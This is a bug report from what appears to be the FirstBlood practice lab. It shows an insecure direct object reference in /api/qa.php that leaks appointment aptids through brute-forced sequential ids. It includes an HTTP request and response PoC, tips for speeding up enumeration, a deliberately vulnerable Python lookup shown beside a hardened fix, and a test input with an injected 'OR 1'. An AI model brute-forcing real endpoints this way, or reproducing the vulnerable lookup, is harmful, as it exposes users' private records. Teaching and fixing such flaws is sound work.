FirstBlood-#58 — Aptid enumeration via http://firstbloodhackers.com:49276/api/qa.php can be used to leak Appointment data
This issue was discovered on FirstBlood v1
On 2021-05-09, 0xconft Level 5 reported:
Hi there,
The http://firstbloodhackers.com:49276/api/qa.php can be used to leak users' appointment data by simply brute-forcing the id parameter of that endpoint. An attacker can validate the correct id by simply grepping for responses that contain the word "success". I also noticed the aptid starts from 56910000, which can be used to make the brute-forcing process faster.
PoC where id 56911356 will return the aptid of john smith (294b1ccb-de2f-4685-821a-9e4d26009b44)
Request
POST /api/qa.php HTTP/1.1
Host: firstbloodhackers.com:49276
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://firstbloodhackers.com:49276
Connection: close
Referer: http://firstbloodhackers.com:49276/yourappointments.php
id=56911356
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:16:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73
/manageappointment.php?success&aptid=294b1ccb-de2f-4685-821a-9e4d26009b44
Best Regards,
0xconft
P2 High
Endpoint: /api/qa.php
Parameter: id
Payload: XXXXXXXX where each X is a decimal digit
FirstBlood ID: 5
Vulnerability Type: Insecure direct object reference
The endpoint qa.php (used to query for an appointment) accepts plain integer values when querying for appointments and returns the matching appointment's aptid without checking that the appointment belongs to the requesting user. The unguessable aptid was a poor attempt at security through obscurity, which the sequential integer lookup bypasses.
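The IDOR described above, modelled in Python as an added example (this is not FirstBlood's code; the table contents apart from john smith's aptid, the "attacker" session user and the function names are constructed assumptions). It keeps the reported behaviour in `lookup_vulnerable` for comparison and puts the fix beside it: `lookup_hardened` ties the lookup to the session user and returns one generic response for "no such id" and "not your appointment", so the "success" token no longer acts as an enumeration oracle.

```python
"""Added example: the /api/qa.php IDOR pattern, vulnerable and hardened.

Not FirstBlood's own code. Sample data, user names and function names are
assumptions made for illustration.
"""

# Constructed stand-in for the appointments table. Sequential integer ids
# (starting at 56910000, as reported) are the enumerable key; aptid is the
# UUID that manageappointment.php expects. John smith's aptid is the value
# from the report; the second row is constructed.
APPOINTMENTS = {
    56911356: {"owner": "john.smith",
               "aptid": "294b1ccb-de2f-4685-821a-9e4d26009b44"},
    56911357: {"owner": "jane.doe",
               "aptid": "00000000-0000-4000-8000-000000000001"},
}

GENERIC_ERROR = "/manageappointment.php?error"


def lookup_vulnerable(appointment_id: int) -> str:
    """Mirrors the reported behaviour: any existing integer id yields the
    redirect carrying the owner's aptid, and the distinct 'success' response
    lets a caller confirm which ids are valid."""
    apt = APPOINTMENTS.get(appointment_id)
    if apt is None:
        return GENERIC_ERROR
    return f"/manageappointment.php?success&aptid={apt['aptid']}"


def lookup_hardened(session_user: str, appointment_id: int) -> str:
    """Ownership-scoped lookup. The appointment must exist AND belong to the
    authenticated session user; both failure cases share one response so the
    endpoint reveals nothing about ids the caller does not own."""
    apt = APPOINTMENTS.get(appointment_id)
    if apt is None or apt["owner"] != session_user:
        return GENERIC_ERROR
    return f"/manageappointment.php?success&aptid={apt['aptid']}"


def handle_request(session_user: str, form: dict) -> str:
    """Form-level entry point: validates the id parameter strictly (digits
    only, bounded length) before it reaches the data layer, then delegates
    to the hardened lookup."""
    raw = form.get("id", "")
    if not raw.isdigit() or len(raw) > 8:  # payload shape: up to 8 decimal digits
        return GENERIC_ERROR
    return lookup_hardened(session_user, int(raw))


if __name__ == "__main__":
    # Same id, different session users: the hardened path only answers the owner.
    print("vulnerable, any caller:", lookup_vulnerable(56911356))
    print("hardened, owner:       ", handle_request("john.smith", {"id": "56911356"}))
    print("hardened, other user:  ", handle_request("attacker", {"id": "56911356"}))
    print("hardened, bad input:   ", handle_request("attacker", {"id": "56911356 OR 1"}))
```

The ownership check is the actual fix; the uniform error response is what removes the "grep for success" oracle the report relies on, and the strict parameter validation keeps non-numeric input away from the query. Replacing the sequential integer with a random per-appointment handle is a worthwhile extra, but on its own it would only repeat the security-through-obscurity mistake without the ownership check.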